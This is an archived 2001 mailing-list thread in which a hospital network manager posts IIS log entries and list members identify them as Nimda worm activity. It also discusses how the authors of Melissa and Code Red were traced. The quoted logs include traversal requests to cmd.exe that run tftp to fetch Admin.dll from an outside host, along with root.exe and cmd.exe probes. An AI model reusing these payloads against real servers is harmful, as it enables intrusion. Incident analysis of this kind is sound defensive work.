Re: [RE: [RE: Any leads?]]

From: J.Michael Cuciti (mcuciti@private)
Date: Fri Sep 21 2001 - 14:32:49 PDT

  • Next message: dldean: "RE: [RE: [RE: Any leads?]]"

    Yes, I am 206.98.124.52.  The ADMIN.DLL file was deleted and the directories
    the event view is referencing do not exist on my system. I have followed all
    instruction for removal from variuos postings from CRIME.  No file refernced
    in posting are on my system.
    
    Do any of you know how I might stop this attack?
    
    -Mike
    
    
    
    dldean@private (dldean) wrote:
    This is 206.98.124.52 receiving get requests for the admin.dll from
    206.98.79.246  and directory requests for his machine from 206.252.224.50 &
    208.238.181.162 .
    
    Doug
    
    > -----Original Message-----
    > From: owner-crime@/var/spool/majordomo/lists/crime
    > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of Kuo,
    > Jimmy
    > Sent: Friday, September 21, 2001 2:06 PM
    > Cc: crime@private
    > Subject: RE: [RE: Any leads?]
    >
    >
    > Oh, I didn't notice the followup questions you asked the first time.
    >
    > I don't know about the structure of your logs.  But are you 206.98.124.52?
    >
    > Could someone who reads IIS logs say if this is him sending or receiving
    > GETs?
    >
    > And this is definitely Nimda.  I just don't know if you're the
    > target or the
    > culprit.  If you haven't upgraded, I'm tempting to believe you're infected
    > and attacking others.  The TFTP command shows up only on or after
    > infection.
    > And ADMIN.DLL (Nimda is admin spelt backwards) is also something
    > that shows
    > up after infection.  But then you say you don't have it...
    >
    > Jimmy
    >
    > > -----Original Message-----
    > > From:	J.Michael Cuciti [SMTP:mcuciti@private]
    > > Sent:	Friday, September 21, 2001 1:44 PM
    > > To:	Kuo Jimmy; Crispin Cowan; Jimmy Sadri
    > > Cc:	crime@private
    > > Subject:	Re: [RE: Any leads?]
    > >
    > > All:
    > >
    > > I still have a script trying to run, but the location and folder doesn't
    > > exist.  The is what I found in my log file:
    > >
    > > 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151,
    > > 304,
    > > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe,
    > > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll,
    > >
    > > 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, 151,
    > > 304,
    > > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe,
    > > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll,
    > >
    > > 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72,
    > > 273,
    > > 403, 5, GET, /scripts/root.exe, /c+dir,
    > >
    > > 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96,
    > > 1652,
    > > 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
    > >
    > > 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97,
    > > 243,
    > > 500, 123, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
    > >
    > > If anybody knows what this is, please 'spain it to me.
    > >
    > > I am running IIS 3.0, NT4.0 w/sp3 (haven't ungraded, I
    > inherited this, not
    > > my
    > > fault :-) )
    > >
    > > In the event log I see this same type of message running every few
    > > minutes.
    > > The script is supposedly running from
    > > \winnt\iisadmin\Scripts\..%5c..\admin.dll.  This does not exist.
    > >
    > > Thanks...
    > >
    > > Mike Cuciti
    > > Network Service and Support MAnager
    > > Tuality Healthcare
    > > 681.1749
    > >
    > >
    > > "Kuo, Jimmy" <Jimmy_Kuo@private> wrote:
    > > >The Melissa author was caught because he posted the infectious
    > document
    > > >from his own AOL account to a news group, rather than releasing it
    > > >through a hacked account. His guilt was confirmed when the
    > serial number
    > > >in the document matched the PC in the dumpster outside his bedroom :-)
    > >
    > > No.  He used a hacked acct.  But we identified the exact time of the use
    > > of
    > > the acct (newsgroup posting message ID) and the FBI traced the phone
    > > records.
    > >
    > > And the PC was destroyed and never located.
    > >
    > > Where did you get your version of the story?
    > >
    > > >But Code Red and its derivatives is not an Office document, and
    > > >therefore has no serial numbers. That investigators appear to have no
    > > >leads months after Code Red appeared tells me that it was likely
    > > >released to the wild from a compromised machine, or perhaps
    > > >simultaneously released from multiple compromised machines. If the
    > > >author(s) were good, then those compromised machines were initially
    > > >attacked from other compromised machines. Likely all of these initial
    > > >release vector machines have long since been wiped and
    > re-installed, and
    > > >the links to the author(s) have been cut.
    > >
    > > We have some "first instances" of traffic.  I don't know what the FBI's
    > > doing with the information gathered so far.  But I agree that it's
    > > difficult
    > > and not likely.
    > >
    > > Jimmy
    >
    



    This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:46 PDT